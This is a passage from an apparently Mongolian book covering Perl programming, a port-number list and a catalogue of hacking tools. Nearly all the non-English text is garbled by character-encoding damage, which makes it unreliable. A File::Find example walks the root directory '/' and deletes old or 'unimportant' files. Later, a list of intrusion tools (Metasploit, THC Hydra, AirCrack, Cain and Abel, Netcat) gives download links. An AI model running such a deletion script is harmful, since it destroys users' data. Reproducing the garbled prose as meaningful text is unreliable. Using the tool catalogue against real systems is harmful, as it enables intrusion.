$found = 1;
last ;
}
}
if ($found) {
print "Hooray! Found t he word 'people' \ n";
}
vp avu: Hooray! Found t he word 'people'
Tycraü :aMaar: C nporpaMa ôaüaar acpar uanyy sypaac:aü ( \ ) xaM:
xaparnaraaar :aMaar:vva:aü aannxau vvpar:aü.
132
Tycraü :aMaar: Taünôap
\ a Byy: aoxno
\ b Backspace
\ d 0-9 xoopoua undp
\ D Undpaac eep
\ n Lnua Mep
\ r Nepunü axaua
\ t Toaopxoü saü mnnxnx
\ f Formfeed
\ s 1 xoocou saü
\ S 1 u xoocou saürvü
\ v Bocoo :oaopxoü saü
\ w Undp ôonou vcar
\ W Undp ôonou vcaruaac eep
\ x{ 2620} Unicode :aMaar:
Subst it ut ion - :aMaar: Mepnüu :oaopxoü xacrnür opnyynax. Xnmaa:
# ! / usr/ bin/ perl
$_ = "Awake! Awake! Fear, Fire, Foes! Awake! Fire, Foes! Awake! ";
s/ Foes/ Flee/ ;
print $_,"\ n";
vp avu: Awake! Awake! Fear, Fire, Flee! Awake! Fire, Foes! Awake!
- Mopynb -
Noayns ôon aurnüuaap ôaruancau daünbu kM. Fypaau susbu Moayns
ôaüaar:
• HparMa:nk Moayns
• C:auaap: Moayns
• HaMan: Moayns
Bna daünaac yumnx, eepnüu ônucau nporpaMbu xacraac amnrnaxbr
xvcaar. Yvunür ônenvvnaxaa ônaaua do, require, use xapar ôonuo. Do -
rnüu xnmaa:
# ! / usr/ bin/ perl
my $a = "Been t here, done t hat , got t he T-shirt ";
do "print it .plx";
Xapnu printit.plx nporpaMbu koa us:
133
print $a; ôaüua. 3ua nporpaMbr axnyynaxaa Use of uninitialized value
in print at printit.plx line 2. racau anaaa saaua. Require - nüu xnmaa:
# ! / usr/ bin/ perl
require "not here.plx";
vp avu: Can't locat e not here.plx in @I NC ( @I NC cont ains: …\ Chap10
C: / ActivePerl/Perl/lib C:/ActivePerl/Perl/site/lib .) at cantload.plx line racau
anaaa saaua
require Mont y: : Phyt on;
3ua Nonty anpek:op ao:pooc Phyton.pm daünbr ayyaax ôaüua.
use ôon sr require mnr ôonoau ky amnrnaxaa axnaaa saax erareepee
snraa:aü.
if($graphical) {
use MyProgram: : Graphical;
} else {
use MyProgram: : Test ;
}
C:auaap: Moayns
File: : Find
# ! / usr/ bin/ perl
use File: : Find;
find(\ &cleanup, "/ ") ;
sub cleanup {
if (-A > 180) {
print "Delet ing old file $_\ n";
unlink $_ or print "oops, couldn't delet e $_: $! \ n";
ret urn;
}
open (FH, $_) or die "Couldn't open $_: $! \ n";
for (1..5) {
my $line = < FH> ;
if ($line = ~ / Perl| Simon| import ant / i) {
ret urn;
}
}
print "Delet ing unimport ant file $_\ n";
unlink $_ or print "oops, couldn' t delet e $_: $! \ n";
134
}
vp avu: Delet ing old file .
oops, couldn't delet e .:
Delet ing unimport ant file Backup.zip
oops, couldn't delet e Backup.zip: Permission denied
Get opt : : St d
# ! / usr/ bin/ perl
use Get opt : : St d;
my %opt ions;
get opt s("vhl: ",\ %opt ions);
if ($opt ions{ v} ) {
print "Hello World, version 3.\ n";
exit ;
} elsif ($opt ions{ h} ) {
print < < EOF;
$0: Typical Hello World program
Synt ax: $0 [ –h| -v| -l < language> ]
-h : This help message
-v : Print version on st andard out put and exit
-l : Turn on int ernat ional language support .
EOF
exit ;
} elsif ($opt ions{ l} ) {
if ($opt ions{ l} eq "french") {
print "Bonj our, t out le monde.\ n";
} else {
die "$0: unsupport ed language\ n";
}
} else {
print "Hello, world.\ n";
}
vp avu: Hello, world.
Get opt : : Long
File: : Spec
# ! / usr/ bin/ perl
use File: : Spec: : Funct ions;
135
foreach (pat h()) {
my $t est = cat file( $_,"dir");
print "Yes, dir is in t he $_ direct ory.\ n";
exit ;
}
print "dir was not found here.\ n";
vp avu: Yes, dir is in t he C: \ WI NDOWS\ syst em32 direct ory.
# ! / usr/ bin/ perl
use Benchmark;
my $howmany = 10000;
my $what = q/ my $j = 1; for (1..100) { $j * = $_} / ;
t imet his($howmany, $what );
vp avu: t imet his 10000: 1 wallclock secs ( 0.31 usr + 0.00 sys =
0.31 CPU) @ 31948.88/ s (n= 10000)
(warning: t oo few it erat ions for a reliable count )
Win32: : Sound
# ! / usr/ bin/ perl
use Win32: : Sound;
my $wav;
Win32: : Sound: : Volume(65535);
opendir (DI R, ".") or die "Couldn't open direct ory: $! ";
while ($wav = readdir(DI R) ) {
Win32: : Sound: : Play( $wav);
}
- Oõ1ex1 -
Perl 5-aac axnau oô¡ek: xauaan:a: nporpaM ôonx mnuaunaracau
ôereea ônaunü eMue Maaax oô¡ek: xauaan:a: :exuonornüu :yxaü spnx
us nnvvu ôns. Toauxouaoo:
Oô¡ek: = A::pnôy: + Ne:oa
Class: Oô¡ek:yyabu uaraan
Encapsulat ion: Orerannür uar:rau aananax
!nheritance: YaaMmnn
Polymorphism: Har nxnn vünanaap snraa:aü vp avua xvpax sau
3aan: amnrnax xnmaa:
136
# ! / usr/ bin/ perl
my $a = [ ] ;
my $b = { } ;
my $c = \ 1;
my $d = \ $c;
print '$a is a ', ref $a, " reference\ n";
print '$b is a ', ref $b, " ref erence\ n";
print '$c is a ', ref $c, " reference\ n";
print '$d is a ', ref $d, " ref erence\ n";
vp avu: $a is a ARRAY reference
$b is a HASH reference
$c is a SCALAR reference
$d is a REF reference
Ne:oa vvcrax xnmaa:
# ! / usr/ bin/ perl
use Person4;
my $obj ect = Person-> new (
surname = > "Galilei",
forename = > "Galileo",
address = > "9.81 Pisa Apt s.",
occupat ion = > "bombadier"
);
print "This person's surname: ", $obj ect -> surname, "\ n";
vp avu: This person's surname: Galilei
Knacc a:pnôy:bu xnmaa:
# ! / usr/ bin/ perl
use warnings;
use st rict ;
use Person6;
print "I n t he beginning: ", Person-> headcount , "\ n";
my $obj ect = Person-> new (
surname = > "Gallelei",
forename = > "Galleleo",
address = > "9.81 Pisa Apt s.",
occupat ion = > "bombadier"
);
print "Populat ion now: ", Person-> headcount , "\ n";
137
my $obj ect 2 = Person-> new (
surname = > "Einst ein",
forename = > "Albert ",
address = > "9E16, Relat ivit y Drive",
occupat ion = > "Plumber"
);
print "Populat ion now: ", Person-> headcount , "\ n";
vp avu: I n t he beginning: 0
Populat ion now: 1
Populat ion now: 2
YaaMmnn
# ! / usr/ bin/ perl
use Employee1;
my $obj ect = Employee-> new (
surname = > "Galilei",
forename = > "Galileo",
address = > "9.81 Pisa Apt s.",
occupat ion = > "bombadier"
);
$obj ect -> print let t er("You owe me money. Please pay it .");
vp avu: Galileo Galilei
9.81 Pisa Apt s.
30/ 11/ 2005
Dear Galileo,
You owe me money. Please pay it .
Yours fait hf ully,
- Ororpnaãa caa -
Perl xannür 2 susaap ererannüu cau:aü xonôoaor. 3xunüx us
DataBase Nanager ôyky DBN Moayns kM. 3ua us aurnüu, xaparnaxaa
xsnôap UN!X-ererannüu :epen kM. ToM ererannüu cau:aü DB! (Dat aBase
!nterface) xonôouo. Database Driver cyynracuaap NySOL, mSOL, Oracle,
!nformix, SyBase sapar ererannüu cauryya:aü axnnnax ôonaor. ODBC
amnrnaaar sMap u ererannüu cau DB!-r amnrnax xonôoraox ôonaor.
DBM us aapaax 5 :epen ôaüua:
138
gdbm - Gnu DBM xypaau aacaapxau vuarvü ererannüu cau.
ndbm - ‘new’ DBM GDBM-r rvüuaxrvü u racau xaM:apu axnnnax uaaaar.
odbm - ‘old’ DBM epeuxnüaee ôon svraap DBM kM.
sdbm - Xaaua u axnnnaaraapaa aaayy, raxaaa uar nx :oM ônm.
bsd-db - ‘Berkeley’ DB uanaaa xvunpxar uarau.
Orerannüu cau uaax xnmaa:
# ! / usr/ bin/ perl
use POSI X;
use SDBM_File; # or GDBM_File / NDBM_File / AnyDBM_File...
my %dbm;
my $db_file= "/ t mp/ demo.dbm";
t ie %dbm, 'SDBM_File', $db_file, O_RDWR, 0;
Orerannüu cauraa xaaxaaa untie ¾dbm;
Har ererannüu cauraac ueree pvv xyynax:
# ! / usr/ bin/ perl
# copydbm.plx
use POSI X;
use NDBM_File;
use GDBM_File;
my (%ndbm_db,%gdbm_db);
my $ndbm_file= '/ t mp/ my_old_ndbm_dat abase';
my $gdbm_file= '/ t mp/ my_new_gdbm_dat abase';
t ie %ndbm_db, 'NDBM_File',$ndbm_file, O_RDONLY, 0;
t ie %gdbm_db, ' GDBM_File',$gdbm_file, O_CREAT| O_WRONLY, 0644;
%gdbm_db= %ndbm_db;
unt ie %ndbm_db;
unt ie %gdbm_db;
DB! ôon ererannüu cau nporpaM 2-nüu xoopoua opuyynaru mnr
axnnnaua.
139
DB! aaMxnx axnnnaaar ererannüu cau:
DBD: : ADO - Microsoft -nüu Active Data Object.
DBD: : Adabas - Adabese ererannüu caurnüu cepaep.
DBD: : Alt era - Alt era ererannüu caurnüu cepaep.
DBD: : CSV - Comma-Separat ed Value SQL ererannüu cau.
DBD: : DB2 - I BM-nüu DB2.
DBD: : Empress - Empressnet ererannüu caurnüu cepaep.
DBD: : I llust ra - I llust ra ererannüu caurnüu cepaep.
DBD: : I nformix - I nformix SE, I nformix Online ererannüu caurnüu
cepaep.
DBD: : I ngres - KoMnsk:epnüu xonôooub Open!ngres ererannüu
caurnüu cepaep.
DBD: : I nt erbase - I nt erbase ererannüu caurnüu cepaep.
DBD: : ODBC - Microsoft -nüu ererannüu cau xonôox npo:okon.
DBD: : Oracle - Oracle ererannüu caurnüu cepaep.
DBD: : Pg - Post greSQL vuarvü ererannüu cau.
DBD: : Proxy - DBI -:aü xonôouo.
DBD: : Search server - Search server/ PCDOCS.
140
DBD: : Solid - Solid ererannüu caurnüu cepaep.
DBD: : Sybase - Sybese ererannüu caurnüu cepaep.
DBD: : Unify - Unif y ererannüu caurnüu cepaep.
DBD: : XBase - XBase ôonou FOX ererannüu caurnüu cepaep.
Msql-MySQL-modules - 2yynaa vuarvü ôaüaar.
Orerannüu cau:aü xonôoxaoo:
my $dbh= DBI -> connect ('dbi: : ') | |
die "Error opening dat abase: $DBI : : errst r\ n";
Canraxaaa:
$dbh-> disconnect ;
Orerannüu cau vvcraxaaa:
# ! \ usr\ bin\ perl
use DBI ;
my ($dbh, $st h);
$dbh= DBI -> connect ('dbi: mysql: t est ','root ','elephant ') | |
die "Error opening dat abase: $DBI : : errst r\ n";
$st h= $dbh-> prepare("CREATE TABLE checkin (
id I NTEGER AUTO_I NCREMENT PRI MARY KEY,
first name VARCHAR(32) NOT NULL,
last name VARCHAR(32) NOT NULL,
checkedin I NTEGER,
numberofbags I NTEGER,
dest inat ion VARCHAR(32) NOT NULL) ");
$st h-> execut e(); # execut e t he st at ement
$st h-> f inish(); # finish t he execut ion
print "All done\ n";
$dbh-> disconnect | | die "Failed t o disconnect \ n";
141
- Xaacpan1 -
142
143
- Dop1yyp -
Xakep ôonox rax ôaüraa kM unus ans nop:br kyua amnrnaaarnür
caüu Maaaar ôaüx xapar:aü. ºnaurysa ron xaparnaraaar nop:yyaaa
amnrnax cypax maapanara:aü. Ans nop:oop ky aaMxnxbr I nt ernet
Assigned Numbers Aut horit y onou yncbu ôaüryynnaraac :or:oox eraer.
Hop: raaar ôon 16 ôn: yp::aü :aMaarrvü (unsigned) :oo ôaüaar. 0 - 1023
ôon aaayy apx:aü nop:, 102+ - +9151 ôon pernc:ep:aü nop:, +9152 -
65535 ôon anuaMnk acaan xyanüu sopnnroop amnrnaraaar nop:. 3apnM
nop:oua oaooroop ky u saaraarvü ôaüaar ôereea mnua svün rapaan
:yxaüu nop:oa xapransyynaar. 3ua ôvx 65000 nop:bu uyayynx ônunx
ôonoMxrvü :yn ron ron nop:yyabu uapnür ônunaa. Bvx nop:bu
xarcaan:br aua caü:aac aau vsax ôonuo.
ht t p: / / www.iana.org/ assignment s/ port -numbers
Hop: 1 - TCP Port Service Mult iplexer
Hop: 2 - Management Ut ilit y
Hop: 7 - Echo
Hop: 11 - Act ive Users
Hop: 13 - Dayt ime
Hop: 18 - Message Send Prot ocol
Hop: 19 - Charact er Generat or
Hop: 20 - File Transfer (Oreraen)
Hop: 21 - File Transfer Prot ocol (Yanpanara)
Hop: 22 - SSH Remot e Login Prot ocol
Hop: 23 - Telnet
Hop: 2+ - Privat e mail syst em
Hop: 25 - Simple Mail Transfer Prot ocol
Hop: 35 - Privat e Print er Server
Hop: 37 - Time
Hop: 38 - Rout e Access Prot ocol
Hop: 39 - Resource Locat ion Prot ocol
Hop: 42 - Host Name Server
Hop: 43 - Who I s
Hop: 45 - Message Processing Module
Hop: 49 - Login Host Prot ocol
Hop: 50 - Remot e Mail Checking Prot ocol
Hop: 52 - XNS Time Prot ocol
Hop: 53 - Domain Name Server
144
Hop: 5+ - XNS Clearinghouse
Hop: 56 - XNS Aut hent icat ion
Hop: 5/ - Privat e Terminal Access
Hop: 58 - XNS Mail
Hop: 59 - Privat e File Service
Hop: 63 - Whois+ +
Hop: 66 - Oracle SQL* NET
Hop: 69 - Trivial File Transf er Prot ocol
Hop: /0 - Gopher
Hop: 79 - Finger
Hop: 80 - HTTP
Hop: 81 - HOSTS2 Name Server
Hop: 84 - Common Trace Facilit y
Hop: 87 - Privat e Terminal Link
Hop: 89 - SU/ MI T Telnet Gat eway
Hop: 90 - DNSI X Securit At t ribut e Token Map
Hop: 92 - Net work Print ing Prot ocol
Hop: 93 - Device Cont rol Prot ocol
Hop: 101 - NI C Host Name Server
Hop: 103 - Genesis Point -t o-Point Trans Net
Hop: 107 - Remot e Telnet Service
Hop: 109 - Post Of fice Prot ocol (POP2)
Hop: 110 - POP3
Hop: 111 - SUN Remot e Procedure Call
Hop: 113 - Aut hent icat ion Service
Hop: 115 - Simple File Transfer Prot ocol
Hop: 118 - SQL Services
Hop: 119 - Net work News Transfer Prot ocol
Hop: 121 - Encore Expedit ed Remot e Pro.Call
Hop: 123 - Net work Time Prot ocol
Hop: 129 - Password Generat or Prot ocol
Hop: 13/ - NETBI OS Name Service
Hop: 138 - NETBI OS Dat agram Service
Hop: 139 - SMB / NETBI OS Session Service
Hop: 143 - I nt ernet Message Access Prot ocol
Hop: 148 - Jargon
Hop: 150 - SQL-NET
Hop: 152 - Background File Transfer Program
Hop: 153 - SGMP
145
Hop: 156 - SQL Service
Hop: 158 - PCMail Server
Hop: 159 - NSS-Rout ing
Hop: 160 - SGMP-TRAPS
Hop: 161 - SNMP in
Hop: 162 - SNMP t rap
Hop: 163 - CMI P/ TCP Manager
Hop: 16+ - CMI P/ TCP Agent
Hop: 165 - Xerox
Hop: 166 - Sirius Syst ems
Hop: 1/9 - Border Gat eway Prot ocol
Hop: 189 - Queued File Transport
Hop: 190 - Gat eway Access Cont rol Prot ocol
Hop: 193 - Spider Remot e Monit oring Prot ocol
Hop: 19+ - I nt ernet Relay Chat Prot ocol
Hop: 19/ - Direct ory Locat ion Service
Hop: 198 - Direct ory Locat ion Service Monit or
Hop: 199 - SMUX
Hop: 209 - Quick Mail Transfer Prot ocol
Hop: 21/ - dBASE Unix
Hop: 220 - I nt eract ive Mail Access Prot ocol v3
Hop: 259 - Efficient Short Remot e Operat ions
Hop: 260 - Openport
Hop: 261 - I I OP Name Service over TLS/ SSL
Hop: 311 - AppleShare I P WebAdmin
Hop: 3+6 - Zebra server
Hop: 3+/ - Fat men Server
Hop: 3+8 - Cablet ron Management Prot ocol
Hop: 359 - Net work Securit y Risk Management Prot ocol
Hop: 361 - Semant ix
Hop: 36+ - Aurora CMGR
Hop: 3/2 - List Processor
Hop: 38+ - A Remot e Net work Server Syst em
Hop: 39/ - Mult i Prot ocol Trans. Net
Hop: 398 - Krypt olan
Hop: +06 - I nt eract ive Mail Support Prot ocol
Hop: +13 - St orage Management Services Prot ocol
Hop: +1+ - I nf oSeek
Hop: +33 - NNSP
146
Hop: +3+ - MobileI P-Agent
Hop: +35 - MobilI P-MN
Hop: ++3 - HTTPS
Hop: 444 - Simple Net work Paging Prot ocol
Hop: 445 - Microsoft SQL Server over Net BI OS
Hop: +50 - Comput er Support ed Telecomunicat ion Applicat ions
Hop: 451 - Cray Net work Semaphore server
Hop: 469 - Radio Cont rol Prot ocol
Hop: 470 - SCX-proxy
Hop: 479 - I afserver
Hop: 480 - I afdbase
Hop: 501 - STMF
Hop: 505 - Mailbox-lm
Hop: 519 - Unixt ime
Hop: 529 - I RC-SERV
Hop: 531 - Chat
Hop: 537 - Net worked Media St reaming Prot ocol
Hop: 546 - DHCPv6 Client
Hop: 547 - DHCPv6 Server
Hop: 552 - DeviceShare
Hop: 563 - NNTP prot ocol over TLS/ SSL
Hop: 565 - Whoami
Hop: 574 - FTP Soft ware Agent Syst em
Hop: 580 - SNTP HEARTBEAT
Hop: 586 - Password Change
Hop: 595 - CAB Prot ocol
Hop: 600 - Sun I PC server
Hop: 604 - TUNNEL
Hop: 614 - SSLshell
Hop: 615 - I nt ernet Configurat ion Manager
Hop: 647 - DHCP Failover
Hop: 651 - I EEE MMS
Hop: 660 - MacOS Server Admin
Hop: 689 - NMAP
Hop: 691 - MS Exchange Rout ing
Hop: 695 - I EEE-MMS-SSL
Hop: 810 - FCP
Hop: 830 - NETCONF over SSH
Hop: 989 - FTP prot ocol, dat a, over TLS/ SSL
147
Hop: 990 - FTP prot ocol, cont rol, over TLS/ SSL
Hop: 992 - Telnet prot ocol over TLS/ SSL
Hop: 993 - I MAP4 prot ocol over TLS/ SSL
Hop: 994 - I RC prot ocol over TLS/ SSL
Hop: 995 - POP3 prot ocol over TLS/ SSL
Hop: 1038 - Message Tracking Query Prot ocol
Hop: 1045 - Fingerprint I mage Transfer Prot ocol
Hop: 1046 - WebFilt er Remot e Monit or
Hop: 1052 - Dynamic DNS Tools
Hop: 1061 - KI OSK
Hop: 1085 - Web Obj ect s
Hop: 1096 - Common Name Resolut ion Prot ocol
Hop: 1100 - Oracle WebCache List ener
Hop: 1114 - Mini SQL
Hop: 1119 - Bat t le.net Chat / Game Prot ocol
Hop: 1120 - Bat t le.net File Transfer Prot ocol
Hop: 1157 - Oracle iASCont rol
Hop: 1159 - Oracle OMS
Hop: 1175 - Dossier Server
Hop: 1176 - I ndigo Home Server
Hop: 1186 - MySQL Clust er Manager
Hop: 1194 - OpenVPN
Hop: 1204 - Log Request List ener
Hop: 1214 - KAZAA
Hop: 1224 - VPNz
Hop: 1227 - DNS2Go
Hop: 1241 - Nessus
Hop: 1258 - Open Net work Library
Hop: 1267 - eTrust Policy Compliance
Hop: 1270 - Microsoft Operat ions Manager
Hop: 1289 - JWalkServer
Hop: 1290 - WinJaServer
Hop: 1308 - Opt ical Domain Service I nt erconnect
Hop: 1333 - Password Policy
Hop: 1369 - GlobalView t o Unix Shell
Hop: 1370 - Unix Shell t o GlobalView
Hop: 1392 - Print Manager
Hop: 1393 - Net work Log Server
148
Hop: 1+33 - Microsoft SQL
Hop: 1+3+ - Microsoft SQL
Hop: 1498 - Sybase SQL
Hop: 1512 - Microsoft 's Windows I nt ernet Name Service
Hop: 1525 - Oracle
Hop: 1527 - Oracle
Hop: 1529 - Oracle
Hop: 1571 - Oracle Remot e Dat a Base
Hop: 1689 - Firefox
Hop: 1893 - MSN messenger
Hop: 19++ - Microsoft SQL Server 7
Hop: 1985 - Hot St andby Rout er Prot ocol
Hop: 2029 - Hot St andby Rout er Prot ocol I Pv6
Hop: 2069 - HTTP Event Port
Hop: 2164 - Dynamic DNS Version 3
Hop: 2427 - Media Gat eway Cont rol Prot ocol Gat eway
Hop: 2439 - SybaseDBSynch
Hop: 2450 - Net admin
Hop: 2451 - Net chat
Hop: 2452 - Snif ferClient
Hop: 2463 - Symbios Raid
Hop: 2529 - UTS FTP
Hop: 2533 - Snif ferServer
Hop: 2594 - sDat a Base Server
Hop: 2679 - Sync Server SSL
Hop: 2697 - Oce SNMP Trap Port
Hop: 2703 - SMS CHAT
Hop: 2775 - SMPP
Hop: 2811 - GSI FTP
Hop: 2892 - Snif ferDat a
Hop: 2926 - Mobile-File-DL
Hop: 2948 - WAP push
Hop: 2949 - WAP push secure
Hop: 3007 - Lot us Mail Tracking Agent Prot ocol
Hop: 3043 - Broadcast Rout ing Prot ocol
Hop: 3051 - Galaxy Server
Hop: 3088 - eXt ensible Dat a Transfer Prot ocol
Hop: 3111 - Web Synchronous Services
Hop: 3119 - D2000 Kernel Port
149
Hop: 3120 - D2000 Webserver Port
Hop: 3126 - Microsoft .NETst er Port
Hop: 3128 - Act ive API Server Port
Hop: 3185 - SuSE Met a PPPD
Hop: 3220 - XML NM over SSL
Hop: 3233 - WhiskerCont rol
Hop: 3274 - Ordinox Server
Hop: 3306 - MySQL
Hop: 3509 - Virt ual Token SSL Port
Hop: 3510 - XSS Port
Hop: 3511 - WebMail/ 2
Hop: 3517 - I EEE 802.11 WLANs WG I APP
Hop: 3567 - Obj ect Access Prot ocol
Hop: 3568 - Obj ect Access Prot ocol over SSL
Hop: 3646 - XSS Server Port
Hop: 3694 - VPN Token Propagat ion Prot ocol
Hop: 3713 - TFTP over TLS
Hop: 3724 - World of Warcraft
Hop: 3832 - xxNETserver
Hop: 3847 - MS Firewall Cont rol
Hop: 3861 - winShadow Host Discovery
Hop: 3932 - Dynamic Sit e Syst em
Hop: 3939 - Ant i-virus Applicat ion Management Port
Hop: 3949 - Dynamic Rout ing I nformat ion Prot ocol
Hop: 4000 - Terabase
Hop: 4112 - Apple VPN Server Report ing Prot ocol
Hop: 4159 - Net work Securit y Service
Hop: 4321 - Remot e Who I s
Hop: 4672 - Remot e file access server
Hop: 4678 - Boundary t raversal
Hop: 4687 - Net work Scanner Tool FTP
Hop: 4751 - Simple Policy Cont rol Prot ocol
Hop: 4752 - Simple Net work Audio Prot ocol
Hop: 4848 - App Server - Admin HTTP
Hop: 5269 - XMPP Server Connect ion
Hop: 5353 - Mult icast DNS
Hop: 5357 - Web Services f or Devices
Hop: 5358 - WS for Devices Secured
Hop: 5432 - Post greSQL Dat abase
150
Hop: 5755 - OpenMail Desk Gat eway server
Hop: 5757 - OpenMail X.500 Direct ory Server
Hop: 6122 - Backup Express Web Server
Hop: 6622 - Mult icast FTP
Hop: 6714 - I nt ernet Backplane Prot ocol
Hop: 6788 - SMC-HTTP
Hop: 6789 - SMC-HTTPS
Hop: 7421 - Mat isse Port Monit or
Hop: 7443 - Oracle Applicat ion Server HTTPS
Hop: 7548 - Threat I nformat ion Dist ribut ion Prot ocol
Hop: 7549 - Net work Layer Signaling Transport Layer
Hop: 7627 - SOAP Service Port
Hop: 7629 - OpenXDAS Wire Prot ocol
Hop: 7677 - Sun App Server - HTTPS
Hop: 7743 - Sakura Script Transfer Prot ocol
Hop: 8008 - HTTP Alt ernat e
Hop: 8080 - HTTP Alt ernat e
Hop: 8081 - Sun Proxy Admin Service
Hop: 8443 - PCsync HTTPS
Hop: 8473 - Virt ual Point t o Point
Hop: 8567 - Obj ect Access Prot ocol Administ rat ion
Hop: 8800 - Sun Web Server Admin Service
Hop: 8989 - Sun Web Server SSL Admin Service
Hop: 9200 - WAP connect ionless session service
Hop: 9201 - WAP session service
Hop: 9202 - WAP secure connect ionless session service
Hop: 9595 - Ping Discovery Service
Hop: 9598 - Very Simple Ct rl Prot ocol
Hop: 10000 - Net work Dat a Management Prot ocol
Hop: 11967 - SysI nfo Service Prot ocol
Hop: 11997 - WorldMailExpress
Hop: 14414 - CA eTrust Web Updat e Service
Hop: 15740 - Pict ure Transfer Prot ocol
Hop: 26000 – Quake
Hop: 30821 - Net scape Ent erprise Server Administ rat ion Server
Hop: 32773 - FileNET Component Manager
Hop: 33434 - Tracerout e
Hop: 44321 - PCP server
Hop: 48128 - I mage Syst ems Net work Services
151
- Xaxepma nporpaM ( t ool s) -
Nmap - Net work mapper-nür aux Fyodor Yarochkin raaar Xakep
xerxvvncau. Windows and Linux axnnnax uaaaap:aü, nop: uaruax
sopnnro:oü.
Baô caü:: ht t p: / / www.insecure.org/ nmap/
Whi sker - Rain Forest Puppy ônucau. 3urnüu CG!-nüu anaaar manraua.
Hepn aaap :ynryypnacau yunp axnaaa Hepn xepavvnaru cyynrax xapar:aü.
Baô caü:: ht t p: / / www.wiret rip.net / rfp
Twwwscan/ Ari rang - 3urnüu CG!-nüu anaaar manraua.
Baô caü:: ht t p: / / www.freebsd.org/ port s/ index.ht ml
St eal t h - Felipe Moniz-nüu ôv:aan. Onou :epnnüu anaaar manraua. 1.0
xyannôap us raxaa 5+59 :epnnüu HTTP anaaar nnpvvnax uaaaap:aü
ôaüaar. Ypranx mnua anaaauyyabr opyynx ôaüaar.
Baô caü:: ht t p: / / www.nst alker.com
Snort - Cvnxaaunü anaaar xsuax sopnynan::aü. Hpo:okonyyaaa
mnuxnnraa xnüx Mam onou :epnnüu e:, exploit -nür nnpvvnax uaaaap:aü.
Baô caü:: www.snort .org/ dl/ binaries/ win32/
Ret i na - Cvnxaa ôonou koMnsk:epvvanüu anaaa xsuaru nporpaM.
Baô caü:: ht t p: / / www.eeye.com/ ret ina
Achi l l es - HTTP/ SSL Proxy manraua. Pokan opunua axnnnax uaaaap:aü.
Baô caü:: www.achilles.org/ pages/ info.asp
Nessus - 3ua us UNI X-bu ron anaaa manraru vuarvü xaparcan.
Baô caü:: www.nessus.org
Wi reshark - Unix ôonou Windows-nüu cvnxaaua mnnaar auanns xnüru
xaparcan. 3ua us Meu cvnxaauaac ereranvvanür ôapsx aaax uaaaap:aü.
Baô caü:: www.filehippo.com/ download_et hereal/
Ni kt o – 3200 opunM akynbr nnpvvnax uaaaap:aü uaan::aü xaparcan.
Baô caü:: ht t p: / / www.cirt .net / code/ nikt o.sht ml
152
John t he Ri pper - XaMrnüu xvunpxar uyyu vr :aünaru.
Baô caü:: ht t p: / / www.openwall.com/ j ohn/
Eraser - Windows-nüu opuub xaMraanan:bu nporpaM.
Baô caü:: ht t p: / / www.heidi.ie/ eraser/ download.php
Net cat - TCP ôa UDP cvnxaaua uaruax ônunx uaaaap:aü.
Baô caü:: ht t p: / / download.insecure.org/ st f/ nc110.t gz
ht t p: / / net cat .sourceforge.net /
Met aspl oi t Framework - 3ua ôon uaan::aü, vünannüu cnc:eMaac vn
xaMaapax exploit xnüx, manrax, xerxvvnaxaa sopnyncau nporpaM.
Baô caü:: ht t p: / / met asploit .org/ t ools/
Hpi ng - I CMP, UDP, TCP-rnüu sus ôvpnüu nake: nnraax uaaaap:aü.
TCP/ I P nake: mnuxnaru.
Baô caü:: http://www.hping.org/
Ki smet - Xvunpxar wireless snif fer. 2 :vamnua 802.11 cvnxaar xsuaru.
Baô caü:: http://www.kismetwireless.net/download.shtml
TCPdump - Cvnxaar xsuaxaa sopnyncau aaxrvü uaaaapnar xaparcan.
Baô caü:: ht t p: / / www.t cpdump.org/
Yersi ni a - Cvnxaaunü anaaar xsuax sopnynan::aü.
Baô caü:: ht t p: / / yersihia.sourcef orge.net
Cai n and Abel - Windows-nüu opunua axnnnaaar mnnaar uyyu vr
:aünaru nporpaM. Nam onou :epneep amnrnax ôonaor.
Baô caü:: www.oxid.it
John t he Ri pper - XaMrnüu xvunpxar uyyu vr :aünaru nporpaM.
Baô caü:: ht t p: / / www.openwall.com/ j ohn/
p0f - Fingerprint xnüua.
Baô caü:: http://www.lcamtuf.coredump.cx/p0f/p0f.shtml
Et hereal - Hpo:okon manraru.
Baô caü:: ht t p: / / www.et hereal.com
153
PuTTY - 3ua ôon Win32, Unix-nüu Telnet ôa SSH xaparnaua.
Baô caü:: http://www.chiark.greenend.org.uk/~sgtatham/putty/
Net St umbl er - Windows-nüu wireless sniffer tool, aurnüu oünroMx:oü
nu:epdeüc:aü.
Baô caü:: ht t p: / / www.st umbler.net /
THC Hydra - Cvnxaaua aut hent icat ion onx aaax sopnynan::aü. Telnet ,
ftp, http, https, smb rax Ma: 30 opunM npo:okon amnrnax uaaaap:aü.
Baô caü:: http://www.thc.segfault.net/thc-hydra/
THC Amap - Annnnkeümu fingerprint ing manraru. Oreraceu nop:br
manrax :oaopxoünoxaoo Mam caüu.
Baô caü:: http://www.thc.segfault.net/thc-amap/
Paros proxy - Baô annnnkeümu proxy anaaa xaüru. SQL inj ect ion, XSS
xaüx uaaaap:aü.
Baô caü:: http://www.parosproxy.org/
Dsni f f - Cvnxaaua sniffer xnüru nporpaM.
Baô caü:: http://www.monkey.org/ ~ dugsong/ dsniff/
GFI LANguard - Windows-nüu ckauuep.
Baô caü:: http://www.gfi.com/ downloads/
Ai rCrack - WEP/ WPA kpakepbu xaparcan
Baô caü:: http://www.aircrack-ng.org/
Superscan - Windows-nüu nop: manraru ping, t racerout e, ht t p head,
whois rax Ma:nür eep:ee aryyncau.
Baô caü:: http://www.foundstone.com/resources/proddesk/superscan.htm
Net f i l t er - Pnuykcnüu kepuen nake: mvvru.
Baô caü:: ht t p: / / www.net filt er.org/
HTTP f uzzer - Bydep avvpax, input-u anaaar manraaar nporpaM.
Baô caü:: www.spidynamics.com/products/webinspect/toolkit.html
154
155
MOHFOR YRCMH 3PYYFHHH XYYRb
XOPHH TABBYFAAP BYP3F
KONHbKTEPHHH N3B33PPHHH AKYPFYH BAHBPbH
3CP3F F3NT X3P3F
226 ayraap svün. KoMnsk:epnüu Maaaanan, nporpaMbr eepunex, aaaax,
cvü:rax
226.1.KoMnsk:ep, koMnsk:epnüu nporpaM, :vvunü :exeepeMxnür
cauaa:aüraap eepunnceu, aaacau, raM:aacau, amnrnax ôonoMxrvü
ôonrocou, Maaaannnüu cvnxaar cvü:racunü ynMaac vnaMx xaMxaaunü
xoxnpon yunpcau ôon xeaenMepnüu xencunü aooa xaMxaar :aanu uaraac
xoëp syy aaxnu uaMaravvncau:aü :auuax xaMxaaunü :erpereep :oprox,
rypaaac aaam sypraau cap xvp:an xyrauaaraap ôapnaunax, acxvn xoëp
xnn xvp:an xyrauaaraap xopnx sn mnü:raua.
